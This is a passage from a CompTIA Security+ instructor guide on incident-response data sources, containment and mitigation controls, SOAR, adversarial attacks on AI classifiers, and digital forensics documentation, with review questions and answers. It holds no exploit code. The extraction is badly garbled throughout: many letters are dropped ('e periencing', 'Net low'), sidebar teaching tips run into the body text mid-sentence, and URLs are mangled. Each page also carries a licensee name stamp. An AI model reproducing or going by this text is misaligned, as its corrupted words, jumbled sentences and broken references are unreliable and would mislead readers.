time analysis and to diagnose any security or operational issues the network is
e periencing. There are plenty of commercial Net low suites, plus products o ering
similar functionality to NetFlow. The SiLK suite (tools.netsa.cert.org/silk/) and nfdump/
nfsen (nfsen.sourceforge.net/ are e amples of open source implementations. Another
popular tool is Argus (openargus.org . This uses a di erent data format to Net low, but
the client tools can read and translate Net low data.

sFlow
sFlow, developed by HP and subsequently adopted as a web standard (tools.ietf.org/
html/rfc3176 , uses sampling to measure traffic statistics at any layer of the I model
for a wider range of protocol types than the I based Net ow. s low can also capture
the entire packet header for samples.

Bandwidth Monitor
Bandwidth usage can be a key indicator of suspicious behavior, if you have reliable
baselines for comparison. ne pected bandwidth consumption could be evidence
of a data e filtration attack, for instance. andwidth usage can be reported by ow
collectors. Firewalls and web security gateways are also likely to support bandwidth
monitoring and alerting.

esson 1 Performing Incident esponse | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 474 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Appropriate Data Sources for
Incident esponse
Answer the following questions:

1. True or alse The first responder is hoe er first reports an incident to

the CIRT.

alse the first responder would be the member of the CI T to handle the report.

2. ou need to correlate intrusion detection data ith e ser er lo files

What component must you deploy to collect IDS alerts in a SIEM?

You need to deploy a sensor to send network packet captures or intrusion detection
alerts to the SIEM.

3. Which software tool is most appropriate for forwarding Windows event logs
to a Syslog-compatible server?

NXlog is designed as a multi-platform logging system.

4. A technician is seeing high volumes of 403 Forbidden errors in a log. What

type of network appliance or server is producing these logs?

403 Forbidden is an HTTP status code, so most likely a web server. Another possibility
is a web pro y or gateway.

5. What type of data source(s) would you look for evidence of a suspicious
TA in

A Message Transfer Agent (MTA) is an SMTP server. You might inspect an SMTP log or
the Internet header metadata of an email message.

6. You are supporting a SIEM deployment at a customer's location. The

customer ants to no hether o records can e in ested hat t pe
o data source is a o record

low records are generated by Net low or I low Information port I I probes.
A ow record is data that matches a ow record, which is a particular combination of
keys (IP endpoints and protocol/port types).

esson 1 Performing Incident esponse | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 475

Topic 17C
Apply Mitigation Controls

EXAM OBJECTIVES COVERED Teaching

1. Given a scenario, analyze potential indicators to determine the type of attack Tip
. Given an incident, apply mitigation techni ues or controls to secure an environment This topic completes
the review of the
incident response
Mitigation techni ues are applied first to contain, and then to eradicate and recover ob ectives by
from the e ects of malicious activity. Incident response is a highly pressured activity, looking at mitigation
with the con icting challenges of eliminating the intrusion without disrupting business techniques. We also
work ows. ou must be able to select and apply the appropriate techni ue for a discuss attacks on AI
given scenario. training data.

Incident Containment Show Slide(s)

As incidents cover such a wide range of di erent scenarios, technologies, motivations, Incident Containment
and degrees of seriousness, there is no standard approach to containment or incident
isolation. ome of the many comple issues facing the CI T are Teaching
• hat damage or theft has occurred already ow much more could be in icted and Tip
in what sort of time frame (loss control)? Note that containment
strategies can be
• What countermeasures are available? What are their costs and implications? in uenced by the need
to preserve forensic
• What actions could alert the attacker to the fact that the attack has been detected? evidence.
What evidence of the attack must be gathered and preserved?

hen an incident has been identified, classified, and prioriti ed, the ne t phase of
incident response is containment. Containment techniques can be classed as either
isolation-based or segmentation-based.

Isolation ased Containment

Isolation involves removing an a ected component from whatever larger environment
it is a part of. This can be everything from removing a server from the network after it
has been the target of a Do attack, to placing an application in a sandbo M outside
of the host environments it usually runs on. Whatever the circumstances may be,
you'll want to make sure that there is no longer an interface between the a ected
component and your production network or the Internet.
A simple option is to disconnect the host from the network completely, either by
pulling the network plug (creating an air gap) or disabling its switch port. This is the
least stealthy option and will reduce opportunities to analyze the attack or malware.
If a group of hosts is a ected, you could use routing infrastructure to isolate one or
more infected virtual LANs (VLANs) in a black hole that is not reachable from the rest
of the network. Another possibility is to use firewalls or other security filters to prevent
infected hosts from communicating.
Finally, isolation could also refer to disabling a user account or application service.
Temporarily disabling users' network accounts may prove helpful in containing damage
if an intruder is detected within the network. Without privileges to access resources, an
intruder will not be able to further damage or steal information from the organization.

esson 1 Performing Incident esponse | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 476 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Applications that you suspect may be the vector of an attack can be much less e ective
to the attacker if the application is prevented from e ecuting on most hosts.

Segmentation-Based Containment
Segmentation-based containment is a means of achieving the isolation of a host
or group of hosts using network technologies and architecture. Segmentation uses
LANs, routing subnets, and firewall ACLs to prevent a host or group of hosts from
communicating outside the protected segment. As opposed to completely isolating the
hosts, you might configure the protected segment as a sinkhole or honeynet and allow
the attacker to continue to receive filtered and possibly modified output over the
C&C channel to deceive him or her into thinking the attack is progressing successfully.
Analysis of the malware code by reverse engineering it could provide powerful
deception capabilities. You could intercept the function calls made by malware to allow
the adversary to believe an attack is proceeding while building detailed knowledge of
their tactics and (hopefully) identity. Attribution of the attack to a particular group will
allow an estimation of adversary capability.

Show Slide(s) Incident radication and eco er

Incident Eradication
After an incident has been contained, you can apply mitigation techniques and controls
and ecovery to eradicate the intrusion tools and unauthori ed configuration changes from your
systems. Eradicating malware, backdoors, and compromised accounts from individual
hosts is not the last step in incident response. You should also consider a recovery
phase where the goal is restoration of capabilities and services. This means that hosts
are fully reconfigured to operate the business work ow they were performing before
the incident. An essential part of recovery is the process of ensuring that the system
cannot be compromised through the same attack vector (or failing that, that the vector
is closely monitored to provide advance warning of another attack).
Eradication of malware or other intrusion mechanisms and recovery from the attack
will involve several steps:
1. econstitution of a ected systems either remove the malicious files or tools
from a ected systems or restore the systems from secure backups images.

If reinstalling from baseline template configurations or images, make sure that there is
nothing in the baseline that allowed the incident to occur If so, update the template before
rolling it out again.

2. Reaudit security controls—ensure they are not vulnerable to another attack. This
could be the same attack or from some new attack that the attacker could launch
through information they have gained about your network.

If your organization is sub ected to a targeted attack, be aware that one incident may be
very uickly followed by another.

3. nsure that a ected parties are notified and provided with the means to
remediate their own systems. or e ample, if customers' passwords are stolen,
they should be advised to change the credentials for any other accounts where
that password might have been used not good practice, but most people do it .

Show Slide(s) ire all Confi uration Chan es

irewall Configuration
Analysis of an attack should identify the vector e ploited by the attacker. This analysis
Changes is used to identify configuration changes that block that attack vector. A configuration

esson 1 Performing Incident esponse | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 477

change may mean the deployment of a new type of security control, or altering the
settings of an e isting control to make it more e ective.
istorically, many organi ations focused on ingress filtering rules, designed to
prevent local network penetration from the Internet. In the current threat landscape,
it is imperative to also apply strict egress filtering rules to prevent malware that has
infected internal hosts by other means from communicating out to C&C servers. Egress
filtering can be problematic in terms of interrupting authori ed network activity, but it
is an essential component of modern network defense. Some general guidelines for
configuring egress filtering are
• Allow only authorized application ports and, if possible, restrict the destination
addresses to authorized Internet hosts. Where authorized hosts cannot be
identified or a default deny is too restrictive, use L and content filtering to try to
detect malicious traffic over authori ed protocols.

• estrict DN lookups to your own or your I 's DN services or authori ed public

resolvers, such as oogle's or uad 's DN services.

• Block access to "known bad" IP address ranges, as listed on don't route or peer
D filter lists.

• Block access from any IP address space that is not authorized for use on your
local network.

• Block all Internet access from host subnets that do not need to connect to the
Internet, such as most types of internal server, workstations used to manage
industrial control systems (ICSs), and so on.

Even within these rules, there is a lot of scope for threat actors to perform command
signaling and e filtration. or e ample, cloud services, such as content delivery
networks and social media platforms, can be used to communicate scripts and
malware commands and to e filtrate data over TT rhinosecuritylabs.com/aws/
hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis .

Content ilter Confi uration Chan es Show Slide(s)

The limitations of a basic packet filtering firewall even if it is stateful mean that some Content Filter
sort of content filtering application pro y may provide better security. These types of Configuration Changes
appliances are usually referred to as secure web gateways (SWGs). A SWG mediates
user access to Internet services, with the ability to block content from regularly
updated URL/domain/IP blacklists and perform intrusion detection/prevention on
traffic based on matching content in application layer protocol headers and payloads.
If a SWG is already in place, an attacker may have found a way to circumvent it via
some sort of backdoor. The network configuration should be checked and updated
to ensure that all client access to the Internet must pass through the SWG. Another
possibility is that the attacker is using a protocol or C C method that is not filtered.
The SWG should be updated with scripts and data, domains and IP addresses, that will
block the e ploit.

Data Loss Prevention (DLP)

Data loss prevention DL performs a similar function, but instead of user access it
mediates the copying of tagged data to restrict it to authorized media and services. An
attack may reveal the necessity of investing in DL as a security control if one is not
already implemented. If DL is enabled and configured in the correct way to enforce
policy, the attacker may have been able to circumvent it using a backdoor method
that the DL software cannot scan. Alternatively, the attacker may have been able to
disguise the data so that it was not recognized.

esson 1 Performing Incident esponse | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 478 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

o ile e ice ana ement

Mobile Device Management MDM provides e ecution control over apps and features
of smartphones. eatures include , camera, and microphone. As with DL , an
intrusion might reveal a vector that allowed the threat actor to circumvent enrollment
or a misconfiguration in the MDM's policy templates.

pdate or e o e Certificates
Compromise of the private key represented by a digital certificate or the ability to
present spoofed certificates as trusted is a critical security vulnerability as it allows an
attacker to impersonate trusted resources and potentially gain unauthorized access to
secure systems.
• emove compromised root certificates if an attacker has managed to install a
root certificate, the attacker can make malicious hosts and services seem trusted.
uspicious root certificates must be removed from the client's cache.

• evoke certificates on compromised hosts if a host is compromised, the private

key it used for digital signatures or digital envelopes is no longer safe. The certificate
associated with the key should be revoked using the Key Compromise property.
The certificate can be rekeyed with a new key pair but the same sub ect and e piry
information.

Show Slide(s) ndpoint Confi uration Chan es

Endpoint
If endpoint security is breached, there are several classes of vector to consider for
Configuration Changes mitigation:
• ocial engineering if the malware was e ecuted by a user, use security education
and awareness to reduce the risk of future attacks succeeding. Review permissions
to see if the account could be operated with a lower privilege level.

• ulnerabilities if the malware e ploited a software fault, either install the patch or
isolate the system until a patch can be developed.

• Lack of security controls—if the attack could have been prevented by endpoint
protection A , host firewall, content filtering, DL , or MDM, investigate the
possibility of deploying them to the endpoint. If this is not practical, isolate the
system from being e ploited by the same vector.

• Configuration drift if the malware e ploited an undocumented configuration

change (shadow IT software or an unauthorized service/port, for instance), reapply
the baseline configuration and investigate configuration management procedures
to prevent this type of ad hoc change.

• eak configuration if the configuration was correctly applied, but was e ploited
anyway, review the template to devise more secure settings. Make sure the
template is applied to similar hosts.

Application Allow Lists and Block Lists

ne element of endpoint configuration is an e ecution control policy that defines
applications that can or cannot be run.
• An allow list or approved list denies e ecution unless the process is e plicitly
authorized.

• A block list or deny list generally allows e ecution, but e plicitly prohibits listed
processes.

esson 1 Performing Incident esponse | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 479

You will need to update the contents of allow lists and block lists in response to
incidents and as a result of ongoing threat hunting and monitoring. Threat hunting
may also provoke a strategic change. or e ample, if you rely principally on e plicit
denies, but your systems are sub ect to numerous intrusions, you will have to consider
adopting a "least privileges" model and using a deny-unless-listed approach. This sort
of change has the potential to be highly disruptive however, so it must be preceded by
a risk assessment and business impact analysis.
ecution control can also be tricky to configure e ectively, with many opportunities
for threat actors to evade the controls. Detailed analysis of the attack might show the
need for changes to the e isting mechanism, or the use of a more robust system.

Quarantine
If mitigating techniques are not successful, or the results are uncertain, the endpoint
will require careful management before being integrated back onto the network. If
further evidence needs to be gathered, the best approach may be to quarantine or
sandbo the endpoint or suspect process file. This allows for analysis of the attack or
tool and collection of evidence using digital forensic techniques.

Security Orchestration, Automation, and Response Show Slide(s)

Automation is the action of scripting a single activity, while orchestration is the action of Security Orchestration,
coordinating multiple automations and possibly manual activity to perform a comple , Automation, and
multistep task. In the case of security orchestration, automation, and response Response
(SOAR), this task is principally incident response, though the technologies can also be
used for tasks such as threat hunting too. SOAR is designed as a solution to the problem
of the volume of alerts overwhelming analysts' ability to respond, measured as the
mean time to respond (MTTR). A SOAR may be implemented as a standalone technology
or integrated with a I M often referred to as a ne t gen I M. The basis of A
is to scan the organization's store of security and threat intelligence, analyze it using
machine/deep learning techniques, and then use that data to automate and provide data
enrichment for the work ows that drive incident response and threat hunting. It can also
assist with provisioning tasks, such as creating and deleting user accounts, making shares
available, or launching Ms from templates, to try to eliminate configuration errors. The
A will use technologies such as cloud and DN D A Is, orchestration tools, and
cyberthreat intelligence CTI feeds to integrate the di erent systems that it is managing.
It will also leverage technologies such as automated malware signature creation and user
and entity behavior analytics A to detect threats.
An incident response work ow is usually defined as a playbook. A playbook is a
checklist of actions to perform to detect and respond to a specific type of incident. A
playbook should be made highly specific by including the uery strings and signatures
that will detect a particular type of incident. A playbook will also account for compliance
factors, such as whether an incident must be reported as a breach plus when and
to whom notification must be made. here a playbook is implemented with a high
degree of automation from a SOAR system, it can be referred to as a runbook, though
the terms are also widely used interchangeably. The aim of a runbook is to automate
as many stages of the playbook as possible, leaving clearly defined interaction points
for human analysis. These interaction points should try to present all the conte tual
information and guidance needed for the analyst to make a quick, informed decision
about the best way to proceed with incident mitigation.

Rapid7 have produced an ebook demonstrating the uses of SOAR (rapid7.com/info/

security-orchestration-and-automation-playbook x d6 w-U). A white paper by
emisto provides a useful overview of the role of SOA across different organizations
(cdn .hubspot.net hubfs 00 1 0 Content 0 ownloads hite 0Papers emisto 0-
0State 0of 0SOA .pdf).

esson 1 Performing Incident esponse | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 480 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Ad ersarial Artificial Intelli ence

Adversarial Artificial
Artificial Intelligence AI type systems are used e tensively for user and entity behavior
Intelligence analytics (UEBA). A UEBA is trained on security data from customer systems and
honeypots. This allows the AI to determine features of malicious code and account
activity and to recognize those features in novel data streams. To make use of UEBA,
host event data and network traffic is streamed to a cloud based analytics service. An
attacker with undetected persistent access to the network, but with a low probability of
e ecting lateral movement or data e filtration, may be in a position to in ect traffic into
this data stream with a long-term goal of concealing tools that could achieve actions on
ob ectives. The attacker may use his or her own AI resources as a means of generating
samples, hence adversarial AI. Manipulated samples could also be uploaded to public
repositories, such as virustotal.com.
or e ample, ML algorithms are highly sensitive to noise. This is demonstrated in image
recognition cases, where given a doctored image of a turtle, an AI will identify it as a
ri e theregister.com mit fooling ai). To a human observer, the image
appears to be that of a perfectly ordinary turtle. Similar techniques might be used to
cause an AI to miscategori e an attack tool as a te t editor.
Successful adversarial attacks mostly depend on knowledge of the algorithms used
by the target AI. This is referred to as a white bo attack. eeping those algorithms
secret forces the adversarial AI to use black bo techni ues, which are more difficult
to develop. Algorithm secrecy is secrecy by obscurity, however, and difficult to ensure.
ther solutions include generating adversarial e amples and training the system
to recogni e them. Another option is to develop a filter that can detect and block
adversarial samples as they are submitted.

A icrosoft presentation at lack at illustrates some of the techni ues that can be used
to mitigate adversarial AI (i.blackhat.com us-1 Thu-August- us-1 -Parikh-Protecting-the-
Protector- ardening- achine- earning- efenses-Against-Adversarial-Attacks.pdf).

esson 1 Performing Incident esponse | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 481

Review Activity:
Mitigation Controls
Answer the following questions:

1. What low-level networking feature will facilitate a segmentation-based

approach to containing intrusion events?

Network segmentation is primarily achieved by virtual LANs (VLANs). A VLAN can be

isolated from the rest of the network.

2. hat confi uration chan e could ou ma e to pre ent misuse o a

developer account?

Disable the account.

3. ollo in a loss o critical I e filtrated rom the local net or to a pu lic

cloud storage network, you decide to implement a type of outbound
filterin s stem hich technolo is most suita le or implementin the
filter

This task is suited to data loss prevention DL , which can block the transfer of tagged
content over unauthorized channels.

4. A threat actor gained access to a remote network over a VPN. Later, you
disco er oota e o the user o the hac ed account ein co ertl filmed
while typing their password. What type of endpoint security solution might
have prevented this breach?

A mobile device management MDM suite can prevent use of the camera function of a
smartphone.

5. True or false? SOAR is intended to provide wholly automated incident

response solutions.

alse incident response is too comple to be wholly automated. A assists the

provision of runbooks, which orchestrates the sequence of response and automate
parts of it, but still requires decision-making from a human responder.

6. You are investigating a client workstation that has not obtained updates to
its endpoint protection software for days. On the workstation you discover
thousands o e ecuta le files ith random names The local endpoint lo
re eals that all o them ha e een scanned and identified as mal are ou
can find no e idence o an urther intrusion on the net or hat is the
likely motive of the threat actor?

This could be an o ine tainted data attack against the endpoint software's
identification engine.

esson 1 Performing Incident esponse | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 482 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Lesson 17
Summary
Teaching ou should be able e plain the process and procedures involved in e ective incident
Tip response and implement strategies to remediate intrusion events.
Check that students
are confident about
the content that has
Guidelines for Performing Incident Response
been covered. If there
Follow these guidelines for developing or improving incident response policies and
is time, revisit any
content e amples that procedures:
they have questions • Identify goals for implementing structured incident response, following the
about. If you have
used all the available preparation, identification, containment, eradication, recovery, and lessons
time for this lesson learned steps.
block, note the issues,
and schedule time for • repare for e ective incident response by creating a CI T C T C I T with suitable
a review later in the communications resources and policies.
course.
• Develop an incident classification system and prepare I s and playbooks for
Interaction distinct incident scenarios, using attack frameworks kill chain, Diamond Model, and
Opportunity MITRE ATT&CK) to facilitate analysis.
Use this as an
opportunity for • Consider whether implementing SOAR and automated runbooks could provide
students to share more e ective response, taking care to protect AI backed systems from tainted
their real-world training data attacks.
e periences with
security incidents. You • Configure I M or syslog to aggregate appropriate data sources and develop
may also encourage
correlation rules display alerts, status indicators, and trend analysis via dashboards:
them to brainstorm
appropriate responses
• ost log file data sources network, system, security, vulnerability scan output .
to hypothetical
scenarios. Consider
• Application log file data sources DN , web, oI .
recording the
incidents and
• Network packet and intrusion detection data.
responses for
review, and present
• Network traffic and protocol ow statistics.
additional content
to see if students
• Integrate incident response containment, eradication, and recovery processes
would want to change
the responses they with procedures for forensic evidence collection, disaster recovery, and business
provided. continuity.

• Identify standard strategies for containment via isolation and segmentation.

• nsure that the recovery process applies necessary configuration changes to

firewalls, content filters, MDM, DL , certificate security, and endpoint application
control.

Lesson 17: Performing Incident Response

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 18
Explaining Digital Forensics

LESSON INTRODUCTION Teaching

Tip
Where incident response emphasizes the swift eradication of malicious activity, Forensics follows
digital forensics requires patient capture, preservation, and analysis of evidence using on from incident
verifiable methods. ou may be called on to assist with an investigation into the details response, but note
of a security incident and to identify threat actors. To assist these investigations, you the di erence in
must be able to summari e the basic concepts of collecting and processing forensic approach.
evidence that could be used in legal action or for strategic counterintelligence.

Lesson Objectives
In this lesson, you will:
• plain key aspects of digital forensics documentation.

• plain key aspects of digital forensics evidence ac uisition.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 484 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Teaching
Tip
The first topic
focuses on the
documentation/
evidence content
e amples. This
content is quite
straightforward, so
hopefully you should
not need to spend
much time on this
topic.
Show Slide(s)
ey Aspects of Digital
orensics
Teaching
Tip
Discuss why digital
forensics techniques
might be used
even if no criminal
prosecution is
planned. tress that
the same standards
of evidence collection
must be applied, even
if the investigation is a
purely internal one.
Lesson 18: Explaining Digital Forensics | Topic 18A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Topic 18A
Explain Key Aspects of Digital
orensics ocumentation
EXAM OBJECTIVES COVERED
4.5 Explain the key aspects of digital forensics
Documentation is critical to collecting, preserving, and presenting valid digital proofs.
Mistakes or gaps in the record of the process can lead to the evidence being dismissed.
ou should be able to e plain key aspects of forensics documentation so that you give
e ective assistance to investigators.
e Aspects o i ital orensics
Digital forensics is the practice of collecting evidence from computer systems to a
standard that will be accepted in a court of law. orensics investigations are most likely
to be launched against crimes arising from insider threats, notably fraud or misuse
of e uipment to download or store obscene material, for instance . rosecuting
e ternal threat sources is often difficult, as the threat actor may well be in a di erent
country or have taken e ective steps to disguise his or her location and identity. uch
prosecutions are normally initiated by law enforcement agencies, where the threat is
directed against military or governmental agencies or is linked to organi ed crime.
Evidence, Documentation, and Admissibility
Like DNA or fingerprints, digital evidence is latent. Latent means that the evidence
cannot be seen with the naked eye rather, it must be interpreted using a machine or
process. This means that great care must be taken to ensure the admissibility of digital
evidence. As well as the physical evidence a hard drive, for instance , digital forensics
requires documentation showing how the evidence was collected and analyzed without
tampering or bias.
Due process is a term used in and common law to re uire that people only
be convicted of crimes following the fair application of the laws of the land. More
generally, due process can be understood to mean having a set of procedural
safeguards to ensure fairness. This principle is central to forensic investigation. If
a forensic investigation is launched or if one is a possibility , it is important that
technicians and managers are aware of the processes that the investigation will use.
It is vital that they are able to assist the investigator and that they not do anything
to compromise the investigation. In a trial, defense counsel will try to e ploit any
uncertainty or mistake regarding the integrity of evidence or the process of collecting it.
The first response period following detection and notification is often critical. To
gather evidence successfully, it is vital that sta do not panic or act in a way that would
compromise the investigation.
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 485

Legal Hold
Legal hold refers to the fact that information that may be relevant to a court case
must be preserved. Information sub ect to legal hold might be defined by regulators
or industry best practice, or there may be a litigation notice from law enforcement or
lawyers pursuing a civil action. This means that computer systems may be taken as
evidence, with all the obvious disruption to a network that entails.

Chain of Custody
Chain of custody documentation reinforces the integrity and proper handling of
evidence from collection, to analysis, to storage, and finally to presentation. hen
security breaches go to trial, the chain of custody protects an organi ation against
accusations that evidence has either been tampered with or is di erent than it was
when it was collected. very person in the chain who handles evidence must log the
methods and tools they used.

Digital Forensics Reports Show Slide(s)

A digital forensics report summari es the significant contents of the digital data and the Digital Forensics
conclusions from the investigator's analysis. It is important to note that strong ethical Reports
principles must guide forensics analysis.
• Analysis must be performed without bias. Conclusions and opinions should be
formed only from the direct evidence under analysis.

• Analysis methods must be repeatable by third parties with access to the same
evidence.

• Ideally, the evidence must not be changed or manipulated. If a device used as

evidence must be manipulated to facilitate analysis disabling the lock feature of a
mobile phone or preventing a remote wipe for e ample , the reasons for doing so
must be sound and the process of doing so must be recorded.

Defense counsel may try to use any deviation of good ethical and professional behavior
to have the forensics investigator's findings dismissed.

E-Discovery Show Slide(s)

A forensic e amination of a device such as a fi ed drive that contains lectronically discovery

tored Information I entails a search of the whole drive including both allocated
and unallocated sectors, for instance . E-discovery is a means of filtering the relevant
evidence produced from all the data gathered by a forensic e amination and storing
it in a database in a format such that it can be used as evidence in a trial. discovery
software tools have been produced to assist this process. ome of the functions of
e discovery suites are
• Identify and de duplicate files and metadata many files on a computer system are
standard installed files or copies of the same file. discovery filters these types of
files, reducing the volume of data that must be analy ed.

• earch allow investigators to locate files of interest to the case. As well as keyword
search, software might support semantic search. emantic search matches
keywords if they correspond to a particular conte t.

• Tags apply standardi ed keywords or labels to files and metadata to help organi e
the evidence. Tags might be used to indicate relevancy to the case or part of the
case or to show confidentiality, for instance.

Lesson 18: Explaining Digital Forensics | Topic 18A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 486 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• ecurity at all points evidence must be shown to have been stored, transmitted,
and analy ed without tampering.

• Disclosure an important part of trial procedure is that the same evidence be made
available to both plainti and defendant. discovery can fulfill this re uirement.
ecent court cases have re uired parties to a court case to provide searchable I
rather than paper records.

Show Slide(s) Video and Witness Interviews

Video and Witness
The first phase of a forensics investigation is to document the scene. The crime scene
Interviews must be recorded using photographs and ideally audio and video. Investigators must
capture every action they take in identifying, collecting, and handling evidence.

emember that if the matter comes to trial, the trial could take place months or years after
the event. It is vital to record impressions and actions in notes. Also consider that in-place
CCT systems or webcams might have captured valuable evidence.

If possible, evidence is gathered from the live system using forensic software tools. It is
vital that these tools do as little to modify the digital data that they capture as possible.
As well as digital evidence, an investigator should interview witnesses to establish
what they were doing at the scene, whether they observed any suspicious behavior or
activity, and also to gather information about the computer system. An investigator
might ask questions informally and record the answers as notes to gain an initial
understanding of the circumstances surrounding an incident. An investigator must
ask uestions carefully, to ensure that the witness is giving reliable information and
to avoid leading the witness to a particular conclusion. Making an audio or video
recording of witness statements produces a more reliable record but may make
witnesses less willing to make a statement. If a witness needs to be compelled to make
a statement, there will be legal issues around employment contracts if the witness is
an employee and right to legal representation.

Show Slide(s) Timelines

Timelines
A significant part of a forensic investigation will involve tying events to specific times
to establish a consistent and verifiable narrative. The visual representation of events
happening in chronological order is called a timeline.
perating systems and file systems use a variety of methods to identify the time at
which something occurred. The benchmark time is Coordinated niversal Time TC ,
which is essentially the time at the reenwich meridian. Local time is the time within a
particular time one, which will be o set from TC by several hours or in some cases,
half hours . The local time o set may also vary if a seasonal daylight saving time is in
place.
NT uses TC internally but many and file systems record time stamps as the
local system time. hen collecting evidence, it is vital to establish how a time stamp is
calculated and note the o set between the local system time and TC.
orensics also needs to consider that a host's system clock may not be properly
synchroni ed to a valid time source or may have been tampered with. Most computers
are configured to synchroni e the clock to a Network Time rotocol NT server.
Closely synchroni ed time is important for authentication and audit systems to work
properly. The right to modify a computer's time would normally be restricted to
administrator level accounts on enterprise networks and time change events should
be logged.

Lesson 18: Explaining Digital Forensics | Topic 18A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 487

Using Autopsy to generate a timeline of events from a disk image.

(Screenshot Autopsy the Sleuth it sleuthkit.org autopsy.)

ent o s and et or Tra c Show Slide(s)

Digital evidence is not ust drawn from analysis of host system memory and data Event Logs and
drives. An investigation may also obtain the event logs for one or more network Network Traffic
appliances and or server hosts. imilarly, network packet captures and traces ows
might provide valuable evidence. n a typical network, sensor and logging systems are
not configured to record all network traffic, as this would generate a very considerable
amount of data. n the other hand, an organi ation with sufficient IT resources could
choose to preserve a huge amount of data. A etrospective Network Analysis NA
solution provides the means to record network events at either a packet header or
payload level.
or forensics, data records that are not supported by physical evidence a data drive
must meet many tests to be admissible in court. or event logs, the drives might not
be accessible or might no longer hold the original logs for network traffic, there is no
physical evidence. here logs and network traffic are captured in a I M, the I M
should demonstrate accuracy that all relevant data was captured and integrity that
neither party could have tampered with the data .

Strategic Intelligence and Counterintelligence Show Slide(s)

In some cases, an organization may conduct a forensics investigation without the trategic
e pectation of legal action. As well as being used in a legal process, forensics has a Intelligence and
role to play in cybersecurity. It enables the detection of past intrusions or ongoing but Counterintelligence
unknown intrusions by close e amination of available digital evidence. A famous uote
attributed to former Cisco C John Chambers illustrates the point There are two
types of companies those that have been hacked, and those who don't know they have
been hacked.

Lesson 18: Explaining Digital Forensics | Topic 18A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 488 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Digital forensics can be used for information gathering to protect against espionage
and hacking. This intelligence is deployed in two di erent ways
• Counterintelligence identification and analysis of specific adversary tactics,
techni ues, and procedures TT provides information about how to configure
and audit active logging systems so that they are most likely to capture evidence of
attempted and successful intrusions.

• trategic intelligence data and research that has been analy ed to produce
actionable insights. These insights are used to inform risk management and security
control provisioning to build mature cybersecurity capabilities.

Lesson 18: Explaining Digital Forensics | Topic 18A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 489

Review Activity:
igital orensics ocumentation
Answer the following questions:

1. hat is the si nificance o the act that di ital e idence is latent

The evidence cannot be seen directly but must be interpreted so the validity of the
interpreting process must be un uestionable.

2. hat should e the first action at a crime scene durin a orensic

in esti ation

reserve the crime scene by recording everything as is, preferably on video.

3. h mi ht a file time stamp not sho the time at hich a crime as

committed

The time stamp may record the niversal Coordinated Time rather than the local time.
An o set would need to be applied and it might need to be demonstrated that the
computer's time one was correctly set .

4. ou e ulfilled our role in the orensic process and no ou plan on

handing the evidence over to an analysis team. What important process
should ou o ser e durin this transition and h

It's important to uphold a record of how evidence is handled in a chain of custody. The
chain of custody will help verify that everyone who handled the evidence is accounted
for, including when the evidence was in each person's custody. This is an important
tool in validating the evidence's integrity.

Lesson 18: Explaining Digital Forensics | Topic 18A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 490 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Teaching
Tip
This topic deals with
more practical issues
around evidence
collection and
integrity, plus use of
the forensics tools
from ob ective . .
Show Slide(s)
Data Acquisition and
Order of Volatility
Teaching
Tip
In practical terms, C
registers and cache
aren't accessible as
sources of forensics
evidence, but advise
students to learn the
full order regardless.
Note that there are
lots of di erent kinds
of cache.
Lesson 18: Explaining Digital Forensics | Topic 18B
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Topic 18B
Explain Key Aspects of Digital Forensics
E idence Ac uisition
EXAM OBJECTIVES COVERED
.1 Given a scenario, use the appropriate tool to assess organizational security
4.5 Explain the key aspects of digital forensics
There are many processes and tools for ac uiring di erent kinds of digital evidence
from computer hosts and networks. These processes must demonstrate e actly how
the evidence was acquired and that it is a true copy of the system state at the time
of the event. hile you may not be responsible for leading evidence ac uisition,
you should be familiar with the processes and tools used, so that you can provide
assistance as re uired.
Data Acquisition and Order of Volatility
Acquisition is the process of obtaining a forensically clean copy of data from a device
held as evidence. If the computer system or device is not owned by the organi ation,
there is the uestion of whether search or sei ure is legally valid. This impacts bring-
